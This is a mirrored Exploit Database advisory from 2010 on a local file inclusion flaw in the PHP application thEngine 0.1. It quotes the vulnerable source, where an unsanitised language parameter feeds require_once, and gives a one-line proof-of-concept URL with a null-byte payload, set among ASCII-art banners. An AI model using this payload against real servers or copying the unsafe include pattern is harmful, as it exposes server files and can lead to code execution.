thEngine 0.1 – Local File Inclusion

• Exploit Database
• 143 阅读

• 作者： team_elite
  日期： 2010-05-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12504/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107

  ============================================================================================= ============================================================================================= == @@@@@@@@@@@@@@@@@@@@@@@ @@ @@@@@@@@@@@@@@@@@@@@@@@@ == == @@@@@@@@@@@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@@@@@@ == ==@@ @@@@ @@@@ @ @ @@ @@@@@@ @@ @@ == ==@@ @@@@ @@@@@ @@@ @@@@@@ @@ @@ == ==@@ @@@@@@@@@@@@@@@ @ @@ @@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@ @@@@ @@ @@@@@@ @@ @@ == ==@@ @@@@ @@@@ @@ @@@@@@ @@ @@ == ==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@@@@@ @@ @@@@@@ == ==@@ @@@@@@@@ @@@@ @@ @@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ == == == ============================================================================================= ============================================================================================= ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~Greetz and Thanks to: All member manadocoding.net ~~~~ ~~~~ ~~~~ ~~~~MC team : team_elite , devilbat , virusfree , doniskynet ,~~~~ ~~~~lumut-- , kisame~~~~ ~~~~~~~~ ~~~~thanks for : cr4wl3r~~~~ ~~~~~~~~ ~~~~Discovered: team_elite[at]Auzs.net ~~~~ ~~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ||| ||| ||| ||| ############################################################################ ## ## ##Download Script: http://sourceforge.net/projects/thengine/files/## ## ## ##Code [test.class.php]: ## ## ## ############################################################################ ||| ||| ||| ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xx <?php xx xx /** xx xx * thEngine xx xx * Copyright (c) 2006 Thion, http://thion.jogger.pl xx xx * This program is free software; you can redistribute it and/or modifyxx xx * it under the terms of the GNU Public General Public License asxx xx * published by the Free Software Foundation; either version 2.1 of thexx xx * License, or (at your option) any later version. xx xx */ xx xx xx xx require_once(&apos;languages/&apos;.$strLanguage.&apos;/test.class.php&apos;); xx xx class test xx xx { xx xx public function __construct() xx xx { xx xx global $opt; xx xx $opt -> assign(&apos;message&apos;, TEST); xx xx $opt -> display(&apos;test.tpl&apos;); xx xx } xx xx } xx xx ?> xx xx xx xx PoC: [thEngine_path]/modules/test/test.class.php?strLanguage=[LFI%00]xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx * -, * -@@ * -@@# * -:@@; * - @@@@@......<code> * -@@@@.@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@ * - @@@@@@@@@@@@@@@@@@@@; * -#@@@@@@@@@@@@@@@@@ * -<code>@@,@@@@@@@@@@@@@@@@@: * - @@@+@@@@@@@ @@@@@@@;@@@ * - :@@@@@@@@@:@,; @@@@@@@ .@@ * -@@@@@@@@@@@:@@@@@@@@@@ * - @@@@&apos; <code> </code> @@@@@@@@@:+. * - .@@@@@@@@@@@@@ . * - , +@@@@@@@@@@@@@ * -+@@@@@@@@@@@@@@@@@@@@# * - ,@@@@@@@@@@@@@@@@@ +@@@ * -<code>@@@@@@@@@@@@@@@@@@@ @@@ * - @@@@@@@@@@@@@@@@@@@ @@ * -@@@@@@@@@@@@@@@@@@ @@ * - +@@@@@@@@@@; @@@# @ * - @@@@@@@@@ : * - @@@@@@@@ ,@@ * -@@@@@@@@@ @@@&apos; * -@@@@@@@<code>@ @@@; * -@@@@@@@@ @.@@@@@@@@ * -@@@@@@@@@@@@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@@@@@@@@@@ * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@ * - @ @@@@@@@@@@@@@@@@@@@,@@@@+ * - @@@@@@@@@@@@@@@@@@@@@@@ * - @@@ @@@@@@@@@@@@@@@; @@@@ * - @@@@@@@@@</code>@@@. @@. * - @@; @@@@#:@@@@@# @@. * - @ @@@: ;@ * -;` @@ ;@ * -@@@ * - @# * - : : * --------------------------------------------->>>> bugs found on may 05 2010 by team_elite.